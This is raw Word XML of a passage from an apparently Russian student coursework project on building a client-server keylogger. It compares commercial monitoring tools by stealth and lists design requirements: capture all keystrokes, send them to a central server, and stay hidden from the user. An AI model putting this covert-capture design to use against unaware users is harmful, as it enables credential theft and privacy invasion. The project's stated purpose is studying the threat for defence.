            <wp:docPr id="8" name="Рисунок 8" descr="Kickidler ÑÑÐ°Ð½ÑÐ»ÑÑÐ¸Ñ ÑÐ°Ð±Ð¾ÑÐ¸Ñ ÑÑÐ¾Ð»Ð¾Ð² ÑÐ¾ÑÑÑÐ´Ð½Ð¸ÐºÐ¾Ð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Kickidler ÑÑÐ°Ð½ÑÐ»ÑÑÐ¸Ñ ÑÐ°Ð±Ð¾ÑÐ¸Ñ ÑÑÐ¾Ð»Ð¾Ð² ÑÐ¾ÑÑÑÐ´Ð½Ð¸ÐºÐ¾Ð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275" w:rsidRPr="00174275" w:rsidRDefault="0056715A" w:rsidP="00174275">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 3</w:t>
      </w:r>
      <w:r w:rsidR="00174275">
        <w:t xml:space="preserve"> – Главное окно Kickidler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00816C88" w:rsidRDefault="00816C88" w:rsidP="00ED6F1F">
      <w:r>
        <w:t xml:space="preserve">Действия, которые позволяет осуществлять </w:t>
      </w:r>
      <w:r w:rsidR="00382468">
        <w:t>система контроля</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00816C88" w:rsidRDefault="00382468" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Перехват нажатий клавиатуры</w:t>
      </w:r>
      <w:r w:rsidR="00816C88">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00816C88" w:rsidRDefault="00816C88" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Просмотр списка окон, открытых на рабочем столе текущего пользователя. </w:t>
      </w:r>
      <w:r w:rsidR="006E3EB1">
        <w:t>С фиксированием времени активности каждого окна в течении рабочего времени</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00816C88" w:rsidRDefault="006E3EB1" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Периодичные снимки рабочего стола пользователя</w:t>
      </w:r>
      <w:r w:rsidR="00816C88">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00816C88" w:rsidRDefault="006E3EB1" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Информация о посещенных сайтах, и времени, проведенном на каждом интернет ресурсе</w:t>
      </w:r>
      <w:r w:rsidR="00816C88">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E3EB1" w:rsidRDefault="006E3EB1" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Видео трансляция рабочего стола пользователя.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F2DB5" w:rsidRDefault="000F2DB5" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc4724255"/>
      <w:r>
        <w:t>Сравнение аналогов</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w:rsidR="0022204A" w:rsidRPr="0022204A" w:rsidRDefault="0022204A" w:rsidP="00ED6F1F">
      <w:r w:rsidRPr="0022204A">
        <w:t xml:space="preserve">В </w:t>
      </w:r>
      <w:r>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="0022204A">
        <w:t xml:space="preserve">аблице </w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="0022204A">
        <w:t xml:space="preserve"> представлено сравнение основных характеристик рассмотренного программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A0E5E" w:rsidRDefault="002A0E5E" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:t>Таблица 1 – Сравнение аналогов диспетчера задач</w:t>
      </w:r>
    </w:p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7"/>
        <w:gridCol w:w="1436"/>
        <w:gridCol w:w="1902"/>
        <w:gridCol w:w="1529"/>
      </w:tblGrid>
      <w:tr w:rsidR="009970DF" w:rsidRPr="00BA5816" w:rsidTr="00D1757A">
        <w:trPr>
          <w:trHeight w:val="600"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="234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970DF" w:rsidRPr="00BA5816" w:rsidRDefault="009970DF" w:rsidP="00BA581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BA5816">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Задачи</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="78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970DF" w:rsidRPr="009970DF" w:rsidRDefault="009970DF" w:rsidP="00BA5816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9970DF">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Kickidler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="103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970DF" w:rsidRPr="006E3EB1" w:rsidRDefault="00174275" w:rsidP="00BA5816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174275">
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>WebWatcher</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="83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970DF" w:rsidRPr="00BA5816" w:rsidRDefault="00D1757A" w:rsidP="006E3EB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D1757A">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Award Keylogger</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009970DF" w:rsidRPr="00BA5816" w:rsidTr="00D1757A">
        <w:trPr>
          <w:trHeight w:val="245"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="234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970DF" w:rsidRPr="00BA5816" w:rsidRDefault="009970DF" w:rsidP="00BA5816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9970DF">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Отчеты по программам и сайтам</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="78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970DF" w:rsidRPr="00BA5816" w:rsidRDefault="009970DF" w:rsidP="00BA581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3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970DF" w:rsidRPr="00BA5816" w:rsidRDefault="00D1757A" w:rsidP="00BA581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83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970DF" w:rsidRPr="00BA5816" w:rsidRDefault="009970DF" w:rsidP="00BA581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BA5816">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009970DF" w:rsidRPr="00BA5816" w:rsidTr="00D1757A">
        <w:trPr>
          <w:trHeight w:val="145"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="234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970DF" w:rsidRPr="00BA5816" w:rsidRDefault="009970DF" w:rsidP="00BA5816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Кейлоггер</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="78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970DF" w:rsidRPr="00BA5816" w:rsidRDefault="009970DF" w:rsidP="00BA581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3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970DF" w:rsidRPr="00BA5816" w:rsidRDefault="009970DF" w:rsidP="00BA581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BA5816">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="83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970DF" w:rsidRPr="00BA5816" w:rsidRDefault="009970DF" w:rsidP="00BA581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BA5816">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009970DF" w:rsidRPr="00BA5816" w:rsidTr="00D1757A">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="234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970DF" w:rsidRPr="00BA5816" w:rsidRDefault="009970DF" w:rsidP="00BA5816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Снятие скриншотов рабочего стола</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="78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970DF" w:rsidRPr="00BA5816" w:rsidRDefault="009970DF" w:rsidP="00BA581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BA5816">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="103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970DF" w:rsidRPr="00BA5816" w:rsidRDefault="00D1757A" w:rsidP="00BA581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83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970DF" w:rsidRPr="00BA5816" w:rsidRDefault="00D1757A" w:rsidP="00BA581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9970DF" w:rsidRPr="00BA5816" w:rsidTr="00D1757A">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="234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970DF" w:rsidRPr="00BA5816" w:rsidRDefault="009970DF" w:rsidP="00BA5816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9970DF">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Просмотр рабочих столов</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="78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970DF" w:rsidRPr="00BA5816" w:rsidRDefault="009970DF" w:rsidP="00BA581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3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970DF" w:rsidRPr="00BA5816" w:rsidRDefault="009970DF" w:rsidP="00BA581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83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970DF" w:rsidRPr="00BA5816" w:rsidRDefault="009970DF" w:rsidP="00BA581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BA5816">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009970DF" w:rsidRPr="00BA5816" w:rsidTr="00D1757A">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="234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970DF" w:rsidRPr="00BA5816" w:rsidRDefault="009970DF" w:rsidP="00BA5816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9970DF">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Просмотр действий</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="78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970DF" w:rsidRPr="00BA5816" w:rsidRDefault="009970DF" w:rsidP="00BA581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BA5816">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="103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970DF" w:rsidRPr="00BA5816" w:rsidRDefault="009970DF" w:rsidP="00BA581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83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970DF" w:rsidRPr="00BA5816" w:rsidRDefault="009970DF" w:rsidP="00BA581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9970DF" w:rsidRPr="00BA5816" w:rsidTr="00D1757A">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="234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970DF" w:rsidRPr="00BA5816" w:rsidRDefault="00D1757A" w:rsidP="00BA5816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Скрытность</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="78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970DF" w:rsidRPr="00D1757A" w:rsidRDefault="00D1757A" w:rsidP="00BA581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2/10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="103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970DF" w:rsidRPr="00D1757A" w:rsidRDefault="00D1757A" w:rsidP="00BA581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6/10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="83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970DF" w:rsidRPr="00D1757A" w:rsidRDefault="00D1757A" w:rsidP="00BA581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3/10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009970DF" w:rsidRPr="00BA5816" w:rsidTr="00D1757A">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="234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970DF" w:rsidRPr="00BA5816" w:rsidRDefault="009970DF" w:rsidP="00BA5816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9970DF">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Платформы</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="784" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009970DF" w:rsidRDefault="009970DF" w:rsidP="00BA581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Win</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009970DF" w:rsidRDefault="009970DF" w:rsidP="00BA581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Mac</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009970DF" w:rsidRPr="00BA5816" w:rsidRDefault="009970DF" w:rsidP="00BA581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Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1038" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009970DF" w:rsidRPr="00BA5816" w:rsidRDefault="009970DF" w:rsidP="00BA581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Win</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="834" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009970DF" w:rsidRPr="00BA5816" w:rsidRDefault="009970DF" w:rsidP="00BA581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Win</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00816C88" w:rsidRPr="00627EFB" w:rsidRDefault="002A0E5E" w:rsidP="00ED6F1F">
      <w:r>
        <w:t xml:space="preserve">Из таблицы 1 можно увидеть, что наибольший функционал поддерживается у продукта </w:t>
      </w:r>
      <w:r w:rsidR="0006356D" w:rsidRPr="0006356D">
        <w:t>Kickidler</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00D1757A">
        <w:t>но его уровень скрытности не подходит для действий злоумышленника</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Тогда как </w:t>
      </w:r>
      <w:r w:rsidR="00D1757A" w:rsidRPr="00D1757A">
        <w:t xml:space="preserve">WebWatcher </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">имеет </w:t>
      </w:r>
      <w:r w:rsidR="00D1757A">
        <w:t>более высокий уровень скрытности</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00627EFB">
        <w:t xml:space="preserve"> Критерий «Скрытность» оценивался по 10 бальной шкале в зависимости от наличия процесса шпиона в диспетчере задач </w:t>
      </w:r>
      <w:r w:rsidR="00627EFB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00627EFB">
        <w:t>, наличие скрытого процесса, наличие службы, заражение драйвера или использование подставных процессов (</w:t>
      </w:r>
      <w:r w:rsidR="00627EFB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>svchost</w:t>
      </w:r>
      <w:r w:rsidR="00627EFB" w:rsidRPr="00627EFB">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00627EFB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>iexplorer</w:t>
      </w:r>
      <w:r w:rsidR="00627EFB">
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidR="00627EFB" w:rsidRPr="00627EFB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00627EFB">
        <w:t xml:space="preserve">Данные предоставлены специалистами </w:t>
      </w:r>
      <w:r w:rsidR="007324E8" w:rsidRPr="007324E8">
        <w:t>COVERT</w:t>
      </w:r>
      <w:r w:rsidR="007324E8">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="007324E8" w:rsidRPr="007324E8">
        <w:t>COVERT</w:t>
      </w:r>
      <w:r w:rsidR="007324E8">
        <w:t xml:space="preserve"> выпускают прикладное ПО для обнаружения программ шпионов и защиты от несанкционированного перехвата действий пользователя.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0022204A" w:rsidRDefault="0022204A" w:rsidP="00ED6F1F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Разрабатываемое программное обеспечение должно обладать следующими св</w:t>
      </w:r>
      <w:r w:rsidR="0079660F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ойствами:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0022204A" w:rsidRDefault="00E8301B" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:num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Перехватывать все нажатия клавиатуры на рабочих ЭВМ для установленных программ и сайтов</w:t>
      </w:r>
      <w:r w:rsidR="0022204A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E8301B" w:rsidRDefault="00E8301B" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:num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Отправлять перехваченные данные на сервер с централизованным центром управления кейлогером.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B1351" w:rsidRDefault="006B1351" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:num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Отображает информацию</w:t>
      </w:r>
      <w:r w:rsidR="00E8301B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> о перехваченных данных</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> по </w:t>
      </w:r>
      <w:r w:rsidR="00E8301B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>каждому ЭВМ отдельно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p w:rsidR="0022204A" w:rsidRPr="0022204A" w:rsidRDefault="00E8301B" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:num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Работать в безоконном режиме и не вызывать подозрений у пользователя</w:t>
      </w:r>
      <w:r w:rsidR="0022204A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0022204A" w:rsidRPr="0022204A" w:rsidRDefault="005F158F" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:num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</w:t>
      </w:r>
      <w:r w:rsidR="0022204A" w:rsidRPr="0022204A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>оддерживать</w:t>
      </w:r>
      <w:r w:rsidR="0022204A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ся</w:t>
      </w:r>
      <w:r w:rsidR="0022204A" w:rsidRPr="0022204A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> на </w:t>
      </w:r>
      <w:r w:rsidR="0022204A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>операционных система</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>х</w:t>
      </w:r>
      <w:r w:rsidR="0022204A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> семейства</w:t>
      </w:r>
      <w:r w:rsidR="0022204A" w:rsidRPr="0022204A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0022204A" w:rsidRPr="0022204A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="0022204A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, начиная с </w:t>
      </w:r>
      <w:r w:rsidR="0022204A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="0022204A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidR="0022204A" w:rsidRPr="0022204A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7</w:t>
      </w:r>
      <w:r w:rsidR="0022204A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F3D4C" w:rsidRDefault="006F3D4C" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc4724256"/>
      <w:r w:rsidRPr="006F3D4C">
        <w:t>Обоснование разработки</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w:rsidR="00B51A76" w:rsidRDefault="001F5A56" w:rsidP="007324E8">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">В век информационных технологий </w:t>
      </w:r>
      <w:r w:rsidR="001B51A2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>существуют угрозы для конфиденциальной информации пользователя</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001B51A2">
        <w:t xml:space="preserve"> Одна из таких угроз кейлогеры. Чтобы оценивать ущерб от работы вредоносного ПО</w:t>
      </w:r>
      <w:r w:rsidR="007324E8">
        <w:t xml:space="preserve"> данного типа и выявить принципы</w:t>
      </w:r>
      <w:r w:rsidR="001B51A2">
        <w:t xml:space="preserve"> защиты от кражи данных путем снятия информации с устройств ввода необходимо понимать принципы работы данного ПО.</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5A56">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00976170" w:rsidRPr="001F5A56" w:rsidRDefault="00976170" w:rsidP="007324E8"/>
    <w:p w:rsidR="000F2DB5" w:rsidRDefault="000F2DB5" w:rsidP="001162E9">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002812CE" w:rsidRDefault="002812CE" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:pStyle w:val="10"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc4724257"/>
      <w:r w:rsidRPr="002812CE">
        <w:lastRenderedPageBreak/>
        <w:t>Конструкторская часть</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w:rsidR="002812CE" w:rsidRDefault="007F073E" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc4724258"/>
      <w:r w:rsidRPr="007F073E">
        <w:t>Архитектура и методология решения задачи</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w:rsidR="000F2DB5" w:rsidRPr="00843683" w:rsidRDefault="000F2DB5" w:rsidP="00ED6F1F">
      <w:r>
        <w:t xml:space="preserve">Приложение, разрабатываемое в рамках курсовой работы, основано на клиент-серверной архитектуре. </w:t>
      </w:r>
      <w:r w:rsidRPr="00843683">
        <w:t xml:space="preserve">Клиент-серверная система характеризуется наличием двух взаимодействующих самостоятельных процессов </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00843683">
        <w:t xml:space="preserve"> клиента и сервера, которые, в общем случае, могут выполняться на разных компьютерах, обмениваясь данными по сети.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F2DB5" w:rsidRDefault="000F2DB5" w:rsidP="00ED6F1F">
      <w:r w:rsidRPr="00843683">
        <w:t>Процессы, реализующие некоторую службу, например, службу файловой системы или ба</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">зы данных, называются серверами. </w:t>
      </w:r>
      <w:r w:rsidRPr="00843683">
        <w:t>Процессы, запрашивающие службы у серверов путем посылки запроса и последующего ожидания ответа от сервера</w:t>
      </w:r>
      <w:r>
        <w:t>, называются клиентами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F2DB5" w:rsidRDefault="000F2DB5" w:rsidP="00ED6F1F">
      <w:r>
        <w:t>В рамках курсовой работы клиент выполняет следующие функции:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD1FBD" w:rsidRPr="0022204A" w:rsidRDefault="00073402" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:num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Производит перехват и запись нажатий клавиатуры для определенных программ и сайтов</w:t>
      </w:r>
      <w:r w:rsidR="00BD1FBD">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD1FBD" w:rsidRDefault="00922E24" w:rsidP="00CF09AF">
